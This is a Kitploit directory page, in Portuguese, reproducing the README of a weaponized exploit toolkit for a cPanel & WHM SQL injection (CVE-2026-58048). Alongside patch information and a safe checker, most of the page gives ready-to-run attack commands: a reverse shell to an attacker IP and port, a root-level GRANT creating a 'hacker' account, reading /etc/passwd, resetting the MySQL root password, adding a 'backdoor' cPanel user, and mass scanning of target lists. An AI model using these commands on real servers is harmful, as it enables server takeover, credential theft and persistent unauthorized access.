Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – Toolkit de Execução SQL Root do cPanel (CVSS 9.4) | Suíte completa de Toolkit Red/Blue Team para cPanel & WHM 11.x não corrigido. 2 ferramentas: Safe Checker (auditoria/relatórios), Weaponized (reverse shell, persistência, UDF RCE, implantação, leitura/escrita de arquivos, operações de banco de dados, varredura em massa). c/Python. 🦾 Use com Ética, Mantenha-se Legal <3 | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoRed TeamingResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Segurança de Banco de Dados
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Ver Repositório
525há 1 mêsAinda não revisado

Sobre

👾 CVE-2026-58048 – Toolkit de Execução SQL Root do cPanel (CVSS 9.4) | Suíte completa de Toolkit Red/Blue Team para cPanel & WHM 11.x não corrigido. 2 ferramentas: Safe Checker (auditoria/relatórios), Weaponized (reverse shell, persistência, UDF RCE, implantação, leitura/escrita de arquivos, operações de banco de dados, varredura em massa). c/Python. 🦾 Use com Ética, Mantenha-se Legal <3

Compartilhar

CVEPoC

💥 CVE‑2026‑58048 – Toolkit de Execução SQL Root do cPanel

Python 3.8+ CVSS Author cPanel

⚠️ APENAS USO ÉTICO – TESTES DE SEGURANÇA AUTORIZADOS
Este repositório fornece ferramentas apenas para profissionais de segurança autorizados, blue teams e testadores de penetração.
O acesso não autorizado a sistemas de computador é ilegal sob o CFAA (EUA), Computer Misuse Act (Reino Unido), TCK 243/244 (Turquia) e leis similares em todo o mundo.


📖 Visão Geral da Vulnerabilidade

CVE‑2026‑58048 é uma vulnerabilidade crítica de injeção SQL nas versões do cPanel & WHM que permite a um usuário autenticado do cPanel executar comandos SQL arbitrários com através da funcionalidade de renomeação de banco de dados.

11.x
privilégios de root do MySQL

Como funciona

  1. Acesso autenticado necessário – o atacante deve ter uma conta cPanel válida (nome de usuário/senha) no servidor alvo.
  2. Manipulação do modo SQL – o exploit define a sessão do MySQL para o modo ANSI_QUOTES, o que altera o comportamento de análise.
  3. Injeção na renomeação de banco de dados – ao renomear um banco de dados, o novo nome não é devidamente sanitizado, permitindo ao atacante injetar comandos SQL arbitrários.
  4. Privilégios de root – como a operação de renomeação é executada com privilégios de root do MySQL, o SQL injetado é executado com as permissões mais altas do banco de dados.
  5. Impacto – tomada completa do banco de dados, escalonamento de privilégios, comprometimento do servidor, roubo de dados, backdoors e movimento lateral. Atualize imediatamente!

Versões Afetadas

  • cPanel & WHM 11.110 e anteriores – vulnerável
  • 11.111 – 11.118 – vulnerável
  • 11.119 – 11.126 – vulnerável
  • 11.127 – 11.134 – vulnerável
  • 11.135 – 11.136 – vulnerável
  • 11.137.x – vulnerável abaixo de 11.137.1.6
  • 11.138.1.6 e posteriores – corrigido

Correção

  • Atualize para cPanel & WHM 11.138.1.6 ou mais recente.
  • Se a atualização não for possível, desative as operações de renomeação do MySQL para usuários do cPanel como solução temporária.

🧰 Ferramentas

FerramentaPropósitoUsuário Pretendido
exploit.pyToolkit completo weaponizado com reverse shell, persistência, RCE via UDF, leitura/escrita de arquivos, operações de banco de dados, suporte a proxy e varredura em massa.Red teams / pentesters autorizados
safecheck.pyVerificador de vulnerabilidade não intrusivo que detecta a versão do cPanel e avalia o risco sem executar qualquer payload malicioso. Gera relatórios detalhados.Blue teams / auditores de segurança

📊 Comparação de Recursos

Recursoexploit.pysafecheck.py
Detecção de vulnerabilidade✅✅
Detecção de versão✅✅
Injeção SQL root do MySQL✅❌
Reverse shell✅❌
Persistência (criação de usuário cPanel)✅❌
RCE via UDF (execução de comandos)✅❌
Leitura/escrita de arquivos✅❌
Operações de banco de dados (qualquer SQL)✅❌
Suporte a proxy✅✅
Varredura em massa (multi-thread)✅❌
Shell interativo✅❌
Modo não intrusivo (seguro)❌✅
Modo Verbose/Debug✅✅
Controle de verificação SSL✅✅
User-Agent personalizado✅✅
Atraso / tentativas de requisição✅❌
Saída JSON / relatório✅✅
Verificação de acessibilidade do endpoint❌✅
Detecção de vazamento de modo SQL❌✅

🎯 Resumo de Casos de Uso

CenárioFerramenta Recomendada
Blue Team – verificar se sua instalação do cPanel é vulnerávelsafecheck.py
Auditoria de Segurança – avaliação de vulnerabilidade não intrusivasafecheck.py
Red Team – teste de penetração autorizado com exploração completaexploit.py
Bug Bounty – teste de divulgação responsávelsafecheck.py
Varredura em Massa – verificar múltiplos alvos quanto à vulnerabilidadeexploit.py (apenas detecção)
Resposta a Incidentes – verificar se os sistemas foram comprometidossafecheck.py

⚙️ Instalação

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Parâmetros

Parâmetros do exploit.py

ParâmetroDescrição
-t, --targetURL do cPanel alvo (ex.: https://cpanel.example.com:2083)
-l, --target-fileArquivo contendo lista de alvos (um por linha) para varredura em massa
-u, --mysql-userNome de usuário do cPanel/MySQL
-P, --mysql-passSenha do cPanel/MySQL
--mysql-portPorta do MySQL (padrão: 3306)
-p, --portSubstituir porta do cPanel (padrão da URL ou 2083)
--threadsNúmero de threads para múltiplos alvos (padrão: 10)
-o, --outputSalvar resultados em arquivo (alvo único)
--logArquivo de log para saída detalhada
-v, --verboseSaída detalhada
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
-ua, --user-agentUser-Agent personalizado
--no-keep-aliveNão manter a sessão ativa
--delayAtraso entre requisições (padrão: 2.0s)
--max-retriesMáximo de tentativas (padrão: 3)
--ssl-verifyVerificar certificados SSL
--cmdComando a executar (prefixe com sql: ou udf: para específico)
--injectSQL personalizado para injetar (substitui outras ações)
--reverse-shellIP:PORT do reverse shell (usa UDF)
--passwdAlterar senha root do MySQL
--adduserCriar usuário cPanel (USER DOMAIN PASSWORD)

Parâmetros do safecheck.py

ParâmetroDescrição
-t, --targetURL do cPanel alvo (ex.: https://cpanel.example.com:2083)
-v, --verboseSaída detalhada
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
-ua, --user-agentUser-Agent personalizado
--ssl-verifyVerificar certificados SSL
--timeoutTempo limite da requisição em segundos (padrão: 10)
--logSalvar relatório em arquivo
--jsonExibir resultados em formato JSON

💥 Cenários

#CenárioComando
1Verificação rápida de vulnerabilidadepython safecheck.py -t https://cpanel.example.com:2083
2Varredura detalhada com relatóriopython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Executar SQL personalizado (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Ler arquivo sensívelpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Alterar senha root do MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Criar novo usuário cPanel (persistência)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interativo após exploraçãopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Varredura em massa a partir de arquivopython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Usar proxy e User-Agent personalizadopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

🧪 Uso de Endpoints e API

O exploit usa os seguintes endpoints UAPI do cPanel:

EndpointPropósito
/execute/Mysql/create_databaseCriar banco de dados temporário
/execute/Mysql/delete_databaseLimpar bancos de dados criados
/execute/Mysql/rename_databaseEndpoint vulnerável – dispara a injeção SQL
/execute/Version/get_versionVerificação de autenticação e versão
/execute/UserManager/create_userCriar novo usuário cPanel (persistência)
/execute/UserManager/list_usersListar usuários existentes

🛡️ Uso Responsável

  • Use estas ferramentas apenas em sistemas que você possui ou tem permissão escrita explícita para testar.
  • O acesso não autorizado é ilegal e antiético.
  • Os autores não são responsáveis por qualquer uso indevido.
  • Sempre siga as leis e regulamentos do seu país.

Este software é fornecido apenas para propósitos educacionais e testes de segurança autorizados.

Baixar ferramenta
--read
Ler um arquivo via LOAD_FILE
-i, --interactiveShell interativo após o exploit
--verifyVerificar sucesso do exploit tentando login no MySQL
--pingPing no alvo antes da exploração